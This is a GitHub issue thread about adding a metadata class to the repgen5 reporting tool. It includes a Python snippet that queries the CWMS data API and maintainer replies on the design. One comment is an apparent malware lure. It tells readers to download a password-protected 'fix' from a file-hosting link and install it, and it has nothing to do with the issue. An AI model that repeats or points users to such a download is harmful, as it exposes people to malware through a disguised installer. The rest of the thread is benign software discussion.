### ISSUE TITLE
Add Meta Class for Project / Gauge / Report Metadata?

### ISSUE THREAD

**Issue by krowvin** [USACE-WaterManagement/repgen5#44]
Should we add a `Meta()` class that allows users to query the various metadata endpoints? 

One example of this is when a user wants to build reports without hard coding the metdata itself. 

Say we make the call 

`repgen5 KEYS -o ... -i ... -O SWT`

Then they use 
```python
project = sys.argv[1]
```` 

to pull KEYS as a `project` variable. 

This would print KEYS on the report, but what if a user could do this? 

```python
project = sys.argv[1]
projectMeta = Meta(
  location=project
 # ...other locations endpoint data
  )
 
 ```
 
 What gets a little sketchy is how you might want to display this object in the form. 
 
 One immediate thought - expose the CDA parameters within the % for something like this in the forms/template
 
 ```python
Longitude: %projectMeta.lon
Latitude: %projectMeta.lat
Public Name: %projectMeta.publicName
#... and so on
 ```
 
 
 On a side note, the following would work (or cwms-python). But thought it might be convenient to provide this *and* a means for directly placing it in templates. 
 ```python
 project = sys.argv[1]
# Quick way to get the lake name for testing
import requests
try : 
    request_meta = requests.get(f"https://cwms-data.usace.army.mil/cwms-data/locations/{project}?office=SWT")
    request_meta.raise_for_status()
    data = request_meta.json()
    project = data["public-name"]
    print(f"\n\tSuccessfully retrieved the lake name from CDA: {project}\n")
except Exception as e:
    print(f"Error: {e}")
    print("FAILED to get the lake name. Defaulting the provided alias.")
LAKENAME = Value()
LAKENAME.picture = str(project)
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MikeNeilson** [comment]
That's a cool idea. though I think I'd make it so one could create a Value for a tsid, then be able to do <value>.meta() to get that locations Meta data as well as getting it directly.

**Comment by krowvin** [comment]
Ooo yeah that's the answer, clean and simple 

Would meta take a key that returns a specific value and cache after the first run perhaps? 

Also would need to monitor dbloc to know when to re request
